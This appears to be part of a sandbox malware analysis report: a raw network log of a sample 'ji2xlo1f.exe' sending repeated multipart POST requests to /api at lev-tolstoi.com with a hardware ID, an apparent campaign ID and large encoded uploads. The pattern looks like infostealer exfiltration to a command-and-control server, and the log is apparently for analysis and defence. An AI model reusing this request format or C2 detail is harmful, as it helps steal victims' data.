                                                                                                                                                                                                                                        2024-12-18 14:17:47 UTC299INData Raw: 53 4b 35 46 62 2b 61 51 50 5a 52 6b 50 79 75 76 4a 4c 4f 62 4b 73 43 55 75 2b 6a 4b 75 59 41 4d 42 32 37 72 41 57 39 4a 36 41 5a 4e 61 77 41 6d 35 52 64 37 69 2b 65 35 50 33 34 67 4d 52 2b 78 31 30 41 38 34 78 6e 71 52 42 4f 42 64 71 73 65 2b 74 73 37 6b 78 72 37 77 54 51 77 52 47 34 45 73 79 75 72 36 6e 45 6c 57 75 72 66 47 66 36 75 53 37 35 46 68 6c 53 6f 2f 74 37 38 6d 7a 75 4a 32 57 6d 45 59 75 49 52 2f 49 42 32 66 79 57 35 4a 4b 4f 62 4d 30 43 64 65 2b 39 4a 2b 34 48 48 78 44 45 6f 7a 48 36 50 4c 45 4a 4b 75 39 59 30 4a 38 52 70 30 4b 51 2f 4b 32 37 6b 73 35 38 78 78 6b 56 76 2b 52 35 75 77 35 41 52 4b 4f 6a 65 36 56 2b 2b 46 34 33 37 30 37 51 33 6c 4c 74 41 39 69 2f 76 36 6d 56 71 42 4b 79 57 45 33 71 70 44 6a 58 4c 77 6c 48 37 72 4d 73 37 47 43 6a
                                                                                                                                                                                                                                        Data Ascii: SK5Fb+aQPZRkPyuvJLObKsCUu+jKuYAMB27rAW9J6AZNawAm5Rd7i+e5P34gMR+x10A84xnqRBOBdqse+ts7kxr7wTQwRG4Esyur6nElWurfGf6uS75FhlSo/t78mzuJ2WmEYuIR/IB2fyW5JKObM0Cde+9J+4HHxDEozH6PLEJKu9Y0J8Rp0KQ/K27ks58xxkVv+R5uw5ARKOje6V++F43707Q3lLtA9i/v6mVqBKyWE3qpDjXLwlH7rMs7GCj
                                                                                                                                                                                                                                        2024-12-18 14:17:47 UTC1369INData Raw: 32 62 66 32 0d 0a 77 54 49 37 67 48 30 4e 63 52 2b 56 47 47 37 4f 66 71 31 6f 64 73 7a 52 49 53 74 2b 5a 36 76 6b 46 63 51 71 32 73 65 2b 74 73 37 6b 78 72 37 77 54 51 77 52 47 34 45 73 79 75 72 36 6e 45 6c 57 75 72 66 47 37 72 74 53 7a 75 41 55 78 7a 36 4b 45 38 76 57 4c 32 45 57 58 33 4c 39 44 52 45 63 42 66 6e 71 54 70 38 70 4b 6a 4c 35 74 4d 52 2f 71 69 5a 4d 63 57 43 46 6a 6b 70 58 6e 54 4a 36 49 5a 5a 65 46 57 6c 74 6b 4a 72 31 2b 65 75 4c 6a 71 69 73 5a 2b 7a 68 63 54 75 2b 4e 37 39 6c 38 58 48 66 58 31 59 36 39 69 39 67 78 6c 39 31 62 58 6d 6b 50 74 46 39 32 71 71 75 33 73 71 43 2b 44 54 30 2f 6e 73 68 66 58 50 77 4e 63 34 4c 74 35 7a 44 71 37 44 69 61 71 45 61 36 6e 58 2f 67 46 32 62 4b 76 71 70 4c 59 62 4a 6f 43 47 4e 58 7a 59 61 6b 75 51 42 33
                                                                                                                                                                                                                                        Data Ascii: 2bf2wTI7gH0NcR+VGG7Ofq1odszRISt+Z6vkFcQq2se+ts7kxr7wTQwRG4Esyur6nElWurfG7rtSzuAUxz6KE8vWL2EWX3L9DREcBfnqTp8pKjL5tMR/qiZMcWCFjkpXnTJ6IZZeFWltkJr1+euLjqisZ+zhcTu+N79l8XHfX1Y69i9gxl91bXmkPtF92qqu3sqC+DT0/nshfXPwNc4Lt5zDq7DiaqEa6nX/gF2bKvqpLYbJoCGNXzYakuQB3
                                                                                                                                                                                                                                        2024-12-18 14:17:47 UTC1369INData Raw: 48 2f 68 54 6e 65 77 57 49 6e 5a 52 37 39 4a 6a 50 4c 70 75 4a 4c 4f 62 4e 4a 42 55 76 36 31 4b 76 38 53 53 57 50 64 6b 6a 58 36 4c 61 41 4f 4b 4b 4d 33 6b 34 68 62 77 53 2f 4c 76 36 65 6b 31 59 41 39 31 51 77 41 34 2f 4e 78 30 46 46 47 48 64 7a 37 65 2b 56 73 37 6c 34 51 72 42 69 65 6e 6b 66 75 58 50 6d 79 72 71 76 45 68 69 47 5a 59 30 50 39 75 57 6d 6e 55 51 67 64 75 2b 64 31 76 53 69 6e 58 6e 33 2f 52 4d 76 4d 41 71 68 42 6a 4b 50 6e 73 35 4b 41 62 4d 30 51 44 71 79 68 61 62 46 52 53 56 37 78 70 7a 33 2b 4f 72 56 5a 47 35 45 7a 68 35 70 42 2b 52 4c 67 67 6f 4b 6d 31 4a 45 32 6b 6b 52 6d 7a 50 4e 6e 71 52 35 4f 42 64 72 31 63 37 30 54 2b 46 34 39 37 30 37 51 72 46 4c 78 48 39 6d 71 75 4f 66 33 67 53 2b 46 52 45 4f 73 2f 57 6e 76 55 56 59 4e 72 66 55 2f
                                                                                                                                                                                                                                        Data Ascii: H/hTnewWInZR79JjPLpuJLObNJBUv61Kv8SSWPdkjX6LaAOKKM3k4hbwS/Lv6ek1YA91QwA4/Nx0FFGHdz7e+Vs7l4QrBienkfuXPmyrqvEhiGZY0P9uWmnUQgdu+d1vSinXn3/RMvMAqhBjKPns5KAbM0QDqyhabFRSV7xpz3+OrVZG5Ezh5pB+RLggoKm1JE2kkRmzPNnqR5OBdr1c70T+F49707QrFLxH9mquOf3gS+FREOs/WnvUVYNrfU/


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        3192.168.2.649747104.21.66.864434176C:\Users\user\Desktop\ji2xlo1f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-18 14:17:49 UTC294OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=MVVVI5DJZ7NBBVVVVVVVVVVVVVVVVVV
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 12940
                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                        2024-12-18 14:17:49 UTC12940OUTData Raw: 2d 2d 4d 56 56 56 49 35 44 4a 5a 37 4e 42 42 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 36 30 37 39 42 38 34 36 45 31 34 42 37 32 32 32 31 42 30 46 43 44 30 35 36 41 34 34 35 34 0d 0a 2d 2d 4d 56 56 56 49 35 44 4a 5a 37 4e 42 42 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 56 56 56 49 35 44 4a 5a 37 4e 42 42 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a
                                                                                                                                                                                                                                        Data Ascii: --MVVVI5DJZ7NBBVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"D66079B846E14B72221B0FCD056A4454--MVVVI5DJZ7NBBVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"2--MVVVI5DJZ7NBBVVVVVVVVVVVVVVVVVVContent-Disposition:
                                                                                                                                                                                                                                        2024-12-18 14:17:54 UTC1039INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 14:17:54 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=a6cdrsp6e6hf65aabra3ql5eb5; expires=Sun, 13-Apr-2025 08:04:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IvcNnE%2FGmucUhpsGanhR4YwmG3ijfS4B5PTPnFrcL5uook9pabtT0zAR88Lmal0xmtsDTM2ZzkAAyvggzCgXtO8aSVsm0SJ%2F%2Bz6hf9KdQLapDmfd8RTW2Xred7uz08RRx4Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f3fc75648884408-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2138&min_rtt=2138&rtt_var=803&sent=12&recv=17&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13892&delivery_rate=1361940&cwnd=201&unsent_bytes=0&cid=05b9cf8a5b7cf6bc&ts=4651&x=0"
                                                                                                                                                                                                                                        2024-12-18 14:17:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                        2024-12-18 14:17:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        4192.168.2.649761104.21.66.864434176C:\Users\user\Desktop\ji2xlo1f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-18 14:17:55 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=JG9YBKYFZRJ37RVVV
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 15102
                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                        2024-12-18 14:17:55 UTC15102OUTData Raw: 2d 2d 4a 47 39 59 42 4b 59 46 5a 52 4a 33 37 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 36 30 37 39 42 38 34 36 45 31 34 42 37 32 32 32 31 42 30 46 43 44 30 35 36 41 34 34 35 34 0d 0a 2d 2d 4a 47 39 59 42 4b 59 46 5a 52 4a 33 37 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 47 39 59 42 4b 59 46 5a 52 4a 33 37 52 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72
                                                                                                                                                                                                                                        Data Ascii: --JG9YBKYFZRJ37RVVVContent-Disposition: form-data; name="hwid"D66079B846E14B72221B0FCD056A4454--JG9YBKYFZRJ37RVVVContent-Disposition: form-data; name="pid"2--JG9YBKYFZRJ37RVVVContent-Disposition: form-data; name="lid"FATE99--november
                                                                                                                                                                                                                                        2024-12-18 14:17:58 UTC1044INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 14:17:58 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=34v27n209ardh0ul3dotf76266; expires=Sun, 13-Apr-2025 08:04:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GlkTL8GrtapFNT7ipW%2B4w8g97e0YwL2Z3mKXxBLvGDkcPXvdcHZZykukUvhgT%2FghVXyZ%2BhoMLCbU0bRAP%2Bk0%2FLm8%2BDOWzEh6IJcZvi0cem7d1y2mzsWVsE9IArPAKrFbdh0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f3fc77b4aa08c96-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1829&rtt_var=695&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16040&delivery_rate=1563169&cwnd=188&unsent_bytes=0&cid=fb483a2fb9703cb3&ts=3019&x=0"
                                                                                                                                                                                                                                        2024-12-18 14:17:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                        2024-12-18 14:17:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        5192.168.2.649771104.21.66.864434176C:\Users\user\Desktop\ji2xlo1f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-18 14:17:59 UTC286OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=KCMPRRNRVFVVVVVVVVVVVVV
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 19996
                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                        2024-12-18 14:17:59 UTC15331OUTData Raw: 2d 2d 4b 43 4d 50 52 52 4e 52 56 46 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 36 30 37 39 42 38 34 36 45 31 34 42 37 32 32 32 31 42 30 46 43 44 30 35 36 41 34 34 35 34 0d 0a 2d 2d 4b 43 4d 50 52 52 4e 52 56 46 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 43 4d 50 52 52 4e 52 56 46 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a
                                                                                                                                                                                                                                        Data Ascii: --KCMPRRNRVFVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"D66079B846E14B72221B0FCD056A4454--KCMPRRNRVFVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"3--KCMPRRNRVFVVVVVVVVVVVVVContent-Disposition: form-data; name="lid"
                                                                                                                                                                                                                                        2024-12-18 14:17:59 UTC4665OUTData Raw: d7 8a f5 0f 24 a7 7a e5 f8 60 f2 e1 6d d1 73 d5 66 a5 31 16 55 bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c
                                                                                                                                                                                                                                        Data Ascii: $z`msf1U2+?2+?2+?
                                                                                                                                                                                                                                        2024-12-18 14:18:01 UTC1045INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 14:18:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=7qfcma9hmrh6ukdo6fphhoctpm; expires=Sun, 13-Apr-2025 08:04:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pdRl6fLCQ428xzAtZShd9uokuA%2B5irh4C2OtUWpF61bLt0jijKsQ%2BCr%2FeqKu%2FpQim%2FnTCIatPmE22SX2vzr2TPdGpceCnlzFGiNIXJt9mmlmzb%2BnwfHaB43oEdfZulPD8zI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f3fc797198742bf-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1613&rtt_var=605&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=20962&delivery_rate=1808049&cwnd=213&unsent_bytes=0&cid=852cf41124d819f2&ts=1963&x=0"
                                                                                                                                                                                                                                        2024-12-18 14:18:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                        2024-12-18 14:18:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        6192.168.2.649782104.21.66.864434176C:\Users\user\Desktop\ji2xlo1f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-18 14:18:04 UTC291OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=J916AMKVVVNFNRVVVVVVVVVVVVVVV
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 1317
                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                        2024-12-18 14:18:04 UTC1317OUTData Raw: 2d 2d 4a 39 31 36 41 4d 4b 56 56 56 4e 46 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 36 30 37 39 42 38 34 36 45 31 34 42 37 32 32 32 31 42 30 46 43 44 30 35 36 41 34 34 35 34 0d 0a 2d 2d 4a 39 31 36 41 4d 4b 56 56 56 4e 46 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 39 31 36 41 4d 4b 56 56 56 4e 46 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d
                                                                                                                                                                                                                                        Data Ascii: --J916AMKVVVNFNRVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"D66079B846E14B72221B0FCD056A4454--J916AMKVVVNFNRVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"1--J916AMKVVVNFNRVVVVVVVVVVVVVVVContent-Disposition: form-
                                                                                                                                                                                                                                        2024-12-18 14:18:05 UTC1032INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 14:18:05 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=gb4ujqjuk7b5drbb9ut34557a8; expires=Sun, 13-Apr-2025 08:04:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=twwckjBLobYkDLbK6fX2PVXUm8KiSy9PQ2o7XNEkgSSCPUdldImzOYOtNl1%2BwKJqXT3hLovHYXkLdbR1pFghCxijI1YdAmtI7bSN2unGLb9ggfhSnEvJEYUAtT4AVroXwZ4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f3fc7b32cdc5e7a-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1618&rtt_var=613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2244&delivery_rate=1776155&cwnd=214&unsent_bytes=0&cid=a1669067f01bd221&ts=1177&x=0"
                                                                                                                                                                                                                                        2024-12-18 14:18:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                        2024-12-18 14:18:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        7192.168.2.649790104.21.66.864434176C:\Users\user\Desktop\ji2xlo1f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-18 14:18:07 UTC295OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=CAJ77ABBJ773RVVVVVVVVVVVVVVVVVV
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 594472
                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                        2024-12-18 14:18:07 UTC15331OUTData Raw: 2d 2d 43 41 4a 37 37 41 42 42 4a 37 37 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 36 30 37 39 42 38 34 36 45 31 34 42 37 32 32 32 31 42 30 46 43 44 30 35 36 41 34 34 35 34 0d 0a 2d 2d 43 41 4a 37 37 41 42 42 4a 37 37 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 41 4a 37 37 41 42 42 4a 37 37 33 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a
                                                                                                                                                                                                                                        Data Ascii: --CAJ77ABBJ773RVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"D66079B846E14B72221B0FCD056A4454--CAJ77ABBJ773RVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"1--CAJ77ABBJ773RVVVVVVVVVVVVVVVVVVContent-Disposition:
                                                                                                                                                                                                                                        2024-12-18 14:18:07 UTC15331OUTData Raw: 53 46 9d a2 67 74 3f 60 df 8e 99 f0 7d 5a ca 9a 64 20 eb 86 4f f7 f0 8b 93 c0 c5 16 96 5a c2 16 37 8d 96 0a 3b 3b 34 7b 37 3a f3 8a 2d e9 6c da 25 39 aa 7c c2 3a e7 0a aa 09 9e a1 6a 6f e3 57 c8 27 fc 77 8a dc 1e 4f 91 eb 1c 34 89 cf 50 3b 3b 18 8e dd 9b 0a 97 57 b8 ed 21 77 fb 66 ab d3 62 40 8d ec ef 08 77 b1 5c d5 07 0b 8c 9f 36 07 7f 4b be d3 f0 b1 30 8d 54 d0 7d 3a ba 81 08 1e 14 6f 5f b2 9d 8a d0 81 2b 3d 11 76 db 54 9e 58 82 84 66 ed 87 e2 49 11 87 e2 45 81 dc 18 94 5a 0b a7 9c 76 64 b8 4a 81 24 3b 42 01 7f 33 81 9a 89 cb 33 94 67 9c 4b ed dc d3 a1 3b da 8c 68 3f 93 cd 32 a9 93 80 7e 77 3f e0 34 cf d1 47 4f a2 b8 2f bc 7d fc da ba 67 cb 50 a2 fa ee e3 ae 02 a3 95 11 0b ff ed 63 5f e4 23 00 13 36 3f e3 26 60 48 60 c6 ee fe 0e 84 81 1a d4 ac 38 ab 61
                                                                                                                                                                                                                                        Data Ascii: SFgt?`}Zd OZ7;;4{7:-l%9|:joW'wO4P;;W!wfb@w\6K0T}:o_+=vTXfIEZvdJ$;B33gK;h?2~w?4GO/}gPc_#6?&`H`8a
